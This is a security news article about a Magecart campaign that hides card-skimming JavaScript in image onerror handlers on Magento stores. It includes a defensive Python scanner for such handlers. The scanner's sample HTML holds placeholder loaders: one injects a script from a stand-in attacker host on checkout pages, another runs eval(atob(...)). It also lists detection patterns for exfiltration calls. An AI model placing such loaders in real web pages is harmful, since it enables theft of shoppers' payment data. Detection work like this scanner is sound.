Cybersecurity researchers from Sucuri have uncovered a new data-stealing campaign targeting online stores running on the Magento platform. Attackers are embedding malicious code within HTML markup, disguising it as image tags to evade detection.
MageCart: The Ongoing Threat to Online Transactions
MageCart is a well-known family of skimming malware designed to steal payment data from online platforms. The cybercriminals behind these attacks use a variety of hacking techniques, on both the client side and the server side, to inject hidden skimmers into payment pages. The malicious code is typically triggered at the checkout stage, either by replacing the legitimate payment form or by intercepting the data the user enters in real time.
The name “MageCart” originates from the initial focus of these attacks—the Magento e-commerce platform, which facilitates shopping cart and payment functionality. Over time, however, attackers have refined their methods, concealing their malicious scripts within fake images, audio files, icons, and even 404 error pages.
A New Level of Stealth: Exploiting the <img> Tag
This latest attack is particularly deceptive because it embeds the malicious code inside an <img> tag on an HTML page. Security researchers point out that this method helps bypass detection by security systems. Since image tags often contain long strings of encoded data, such as file paths or base64-encoded images, the presence of hidden code doesn’t immediately raise suspicion.
The key trick lies in the use of the onerror event. Normally, browsers fire this event when an image fails to load, and pages use it to run fallback logic such as swapping in a placeholder image. In this case, however, attackers exploit it to execute arbitrary JavaScript instead: the injected script blends seamlessly into the page while appearing to be a standard error-handling mechanism.
Once activated, the malicious code detects whether a payment page is open. As soon as a user clicks the payment confirmation button, the script captures the credit card details—including the card number, expiration date, and CVV code—and transmits them to a remote server. In this campaign, stolen data is sent to a domain named wellfacing[.]com, making it accessible to the attackers.
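The following is an added defender-side example, written for this article and not part of Sucuri's tooling or of any code the campaign used. It shows one way to audit a page's HTML for the pattern described in the two preceding sections: it parses every <img> tag, pulls out its onerror handler, lets a plain fallback handler (one that only assigns a replacement src) pass, and scores anything else against traits of a skimmer loader: decoding or eval of encoded strings, dynamic script insertion, checkout-page probing, outbound requests, long base64 runs, and references to hosts other than the store's own. The sample HTML, the store host shop.example and the domain evil-skimmer.example are constructed for the demonstration; the "malicious" handlers are inert placeholders that only carry the textual traits the scanner looks for.

```python
"""Static audit of <img onerror=...> handlers for skimmer loaders.

Added example for this article (not Sucuri's code). Scores each inline
onerror handler against traits of the technique described above and
reports those that look like more than an image fallback.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Textual traits of inline skimmer loaders; each match adds one point.
SUSPICIOUS_PATTERNS = {
    "eval_or_function": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("),
    "encode_decode": re.compile(r"\b(atob|btoa|unescape|fromCharCode)\s*\(", re.I),
    "script_injection": re.compile(r"createElement\s*\(\s*['\"]script['\"]", re.I),
    "exfil_api": re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon)\s*\(|\.src\s*=\s*['\"]https?:", re.I),
    "checkout_probe": re.compile(r"checkout|payment|card|cvv", re.I),
    "long_encoded_blob": re.compile(r"[A-Za-z0-9+/=]{80,}"),
}
# The legitimate use of onerror: swap in a replacement image and nothing else.
BENIGN_FALLBACK = re.compile(r"^\s*this\.src\s*=\s*['\"][^'\"]+['\"]\s*;?\s*$")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


class ImgHandlerCollector(HTMLParser):
    """Collects the src, onerror and source line of every <img> that has onerror."""

    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "img":
            return
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if "onerror" in attrs:
            self.handlers.append({"src": attrs.get("src", ""),
                                  "onerror": attrs["onerror"],
                                  "line": self.getpos()[0]})


def external_hosts(handler, page_host):
    """Hosts referenced by absolute URLs in the handler, other than the store itself."""
    hosts = set()
    for url in URL_RE.findall(handler):
        host = urlparse(url).hostname
        if host and host != page_host:
            hosts.add(host)
    return sorted(hosts)


def assess_handler(handler, page_host):
    """Score one onerror handler; a bare image fallback scores 0."""
    if BENIGN_FALLBACK.match(handler):
        return {"score": 0, "reasons": []}
    reasons = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(handler)]
    hosts = external_hosts(handler, page_host)
    if hosts:
        reasons.append("external_host:" + ",".join(hosts))
    return {"score": len(reasons), "reasons": reasons}


def scan_html(html, page_host, threshold=2):
    """Return the <img onerror> handlers whose score reaches the threshold."""
    collector = ImgHandlerCollector()
    collector.feed(html)
    findings = []
    for h in collector.handlers:
        verdict = assess_handler(h["onerror"], page_host)
        if verdict["score"] >= threshold:
            findings.append({"line": h["line"], "src": h["src"], **verdict})
    return findings


# Constructed sample page: one legitimate fallback handler and two placeholder
# loaders that carry the traits of the technique (no working payload).
# __BLOB__ is replaced by an 80-character base64 run that merely encodes 60 'A's.
SAMPLE_HTML = """<html><body>
<img src="/media/logo.png" onerror="this.src='/media/fallback.png'">
<img src="/static/placeholder.png" alt="" onerror="
  if(location.pathname.indexOf('checkout')>-1){
    var s=document.createElement('script');
    s.src='https://evil-skimmer.example/'+btoa(document.title);
    document.head.appendChild(s);}">
<img src="x" onerror="eval(atob('__BLOB__'))">
</body></html>""".replace("__BLOB__", "QUFB" * 20)

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML, "shop.example"):
        print(f"line {f['line']}: src={f['src']!r} score={f['score']} reasons={f['reasons']}")
```

The benign-fallback whitelist is deliberately narrow: an onerror handler that does anything beyond assigning a new src deserves a look, and the score simply orders the review queue. Run the scanner over the rendered checkout page (what the browser actually receives) rather than the template on disk, since server-side injections only show up in the served output.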
Why This Attack Is So Dangerous
Security experts emphasize that this attack is not only well-hidden but also highly effective. Cybercriminals achieve two key objectives:
- Evading Security Scanners – By embedding the skimming script within seemingly harmless image tags, attackers successfully bypass many security detection mechanisms.
- Avoiding User Suspicion – Since the fake payment form closely mimics the real one, most users are unlikely to notice that their data is being stolen.
Evolving Threats to E-Commerce Platforms
Attacks against platforms such as Magento, WooCommerce, and PrestaShop continue to evolve, becoming increasingly sophisticated. Malicious scripts are often encrypted and leverage unconventional obfuscation techniques, making detection even more challenging. These emerging threats highlight the growing ingenuity of cybercriminals and reinforce the need for constant security monitoring and vigilance in the e-commerce space.
To protect online stores and customers, website owners should implement robust security measures, regularly audit their systems, and stay informed about the latest cybersecurity threats.